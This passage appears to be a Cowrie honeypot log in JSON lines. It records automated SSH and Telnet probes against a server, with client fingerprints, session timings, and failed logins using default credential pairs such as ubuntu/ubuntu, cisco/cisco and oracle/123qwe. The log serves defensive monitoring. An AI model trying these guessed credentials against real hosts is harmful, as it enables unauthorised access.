{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-31T04:55:17.276736Z","src_ip":"212.227.235.229","session":"726fd023c445"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-31T04:55:17.691702Z","src_ip":"212.227.235.229","session":"726fd023c445"}
{"eventid":"cowrie.login.failed","username":"support","password":"1234","message":"login attempt [support/1234] failed","sensor":"my-vps","timestamp":"2025-08-31T04:55:19.076972Z","src_ip":"212.227.235.229","session":"b624fae64c96"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":60878,"dst_ip":"1.2.3.4","dst_port":22,"session":"3a92a0019c72","protocol":"ssh","message":"New connection: 212.227.235.229:60878 (1.2.3.4:22) [session: 3a92a0019c72]","sensor":"my-vps","timestamp":"2025-08-31T04:55:19.403195Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-31T04:55:19.488037Z","src_ip":"212.227.235.229","session":"3a92a0019c72"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":36615,"dst_ip":"1.2.3.4","dst_port":23,"session":"c2d82e85f624","protocol":"telnet","message":"New connection: 212.227.125.160:36615 (1.2.3.4:23) [session: c2d82e85f624]","sensor":"my-vps","timestamp":"2025-08-31T04:55:19.608603Z"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-31T04:55:19.672266Z","src_ip":"212.227.235.229","session":"3a92a0019c72"}
{"eventid":"cowrie.login.failed","username":"sysadmin","password":"sysadmin","message":"login attempt [sysadmin/sysadmin] failed","sensor":"my-vps","timestamp":"2025-08-31T04:55:20.817677Z","src_ip":"212.227.235.229","session":"3a92a0019c72"}
{"eventid":"cowrie.session.closed","duration":"2.9","message":"Connection lost after 2.9 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:55:22.296795Z","src_ip":"212.227.235.229","session":"3a92a0019c72"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":60888,"dst_ip":"1.2.3.4","dst_port":22,"session":"fd284285fa3c","protocol":"ssh","message":"New connection: 212.227.235.229:60888 (1.2.3.4:22) [session: fd284285fa3c]","sensor":"my-vps","timestamp":"2025-08-31T04:55:23.167368Z"}
{"eventid":"cowrie.session.closed","duration":"9.2","message":"Connection lost after 9.2 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:55:23.243763Z","src_ip":"212.227.235.229","session":"b624fae64c96"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-31T04:55:23.244687Z","src_ip":"212.227.235.229","session":"fd284285fa3c"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-31T04:55:23.429287Z","src_ip":"212.227.235.229","session":"fd284285fa3c"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":44364,"dst_ip":"1.2.3.4","dst_port":22,"session":"6f3398131af2","protocol":"ssh","message":"New connection: 212.227.125.160:44364 (1.2.3.4:22) [session: 6f3398131af2]","sensor":"my-vps","timestamp":"2025-08-31T04:55:23.829930Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T04:55:23.831522Z","src_ip":"212.227.125.160","session":"6f3398131af2"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T04:55:24.012766Z","src_ip":"212.227.125.160","session":"6f3398131af2"}
{"eventid":"cowrie.login.failed","username":"ubuntu","password":"ubuntu","message":"login attempt [ubuntu/ubuntu] failed","sensor":"my-vps","timestamp":"2025-08-31T04:55:24.735358Z","src_ip":"212.227.235.229","session":"fd284285fa3c"}
{"eventid":"cowrie.login.failed","username":"oracle","password":"123qwe","message":"login attempt [oracle/123qwe] failed","sensor":"my-vps","timestamp":"2025-08-31T04:55:24.743516Z","src_ip":"212.227.125.160","session":"6f3398131af2"}
{"eventid":"cowrie.session.connect","src_ip":"79.127.48.196","src_port":54829,"dst_ip":"1.2.3.4","dst_port":22,"session":"33e408ff24da","protocol":"ssh","message":"New connection: 79.127.48.196:54829 (1.2.3.4:22) [session: 33e408ff24da]","sensor":"my-vps","timestamp":"2025-08-31T04:55:25.630540Z"}
{"eventid":"cowrie.session.closed","duration":"2.1","message":"Connection lost after 2.1 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:55:25.927127Z","src_ip":"212.227.125.160","session":"6f3398131af2"}
{"eventid":"cowrie.session.closed","duration":"2.8","message":"Connection lost after 2.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:55:26.016034Z","src_ip":"212.227.235.229","session":"fd284285fa3c"}
{"eventid":"cowrie.login.failed","username":"cisco","password":"cisco","message":"login attempt [cisco/cisco] failed","sensor":"my-vps","timestamp":"2025-08-31T04:55:26.658403Z","src_ip":"212.227.235.229","session":"726fd023c445"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":33962,"dst_ip":"1.2.3.4","dst_port":22,"session":"9d1fb6470ed2","protocol":"ssh","message":"New connection: 212.227.235.229:33962 (1.2.3.4:22) [session: 9d1fb6470ed2]","sensor":"my-vps","timestamp":"2025-08-31T04:55:27.404970Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-31T04:55:27.406162Z","src_ip":"212.227.235.229","session":"9d1fb6470ed2"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-31T04:55:27.652000Z","src_ip":"212.227.235.229","session":"9d1fb6470ed2"}
{"eventid":"cowrie.session.closed","duration":"10.8","message":"Connection lost after 10.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:55:27.968231Z","src_ip":"212.227.235.229","session":"726fd023c445"}
{"eventid":"cowrie.login.failed","username":"ubnt","password":"ubnt123","message":"login attempt [ubnt/ubnt123] failed","sensor":"my-vps","timestamp":"2025-08-31T04:55:29.008280Z","src_ip":"212.227.235.229","session":"9d1fb6470ed2"}
{"eventid":"cowrie.session.closed","duration":46.55710530281067,"message":"Connection lost after 46 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:55:30.274212Z","src_ip":"121.181.124.85","session":"a81c6e54ba98"}
{"eventid":"cowrie.session.closed","duration":"3.2","message":"Connection lost after 3.2 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:55:30.627173Z","src_ip":"212.227.235.229","session":"9d1fb6470ed2"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":44674,"dst_ip":"1.2.3.4","dst_port":22,"session":"0a024f90290b","protocol":"ssh","message":"New connection: 212.227.235.229:44674 (1.2.3.4:22) [session: 0a024f90290b]","sensor":"my-vps","timestamp":"2025-08-31T04:55:31.990014Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-31T04:55:32.062586Z","src_ip":"212.227.235.229","session":"0a024f90290b"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-31T04:55:32.248758Z","src_ip":"212.227.235.229","session":"0a024f90290b"}
{"eventid":"cowrie.session.closed","duration":12.916810035705566,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:55:32.525343Z","src_ip":"212.227.125.160","session":"c2d82e85f624"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":45220,"dst_ip":"1.2.3.4","dst_port":22,"session":"e25c273519e0","protocol":"ssh","message":"New connection: 212.227.125.160:45220 (1.2.3.4:22) [session: e25c273519e0]","sensor":"my-vps","timestamp":"2025-08-31T04:55:34.682514Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T04:55:34.683265Z","src_ip":"212.227.125.160","session":"e25c273519e0"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh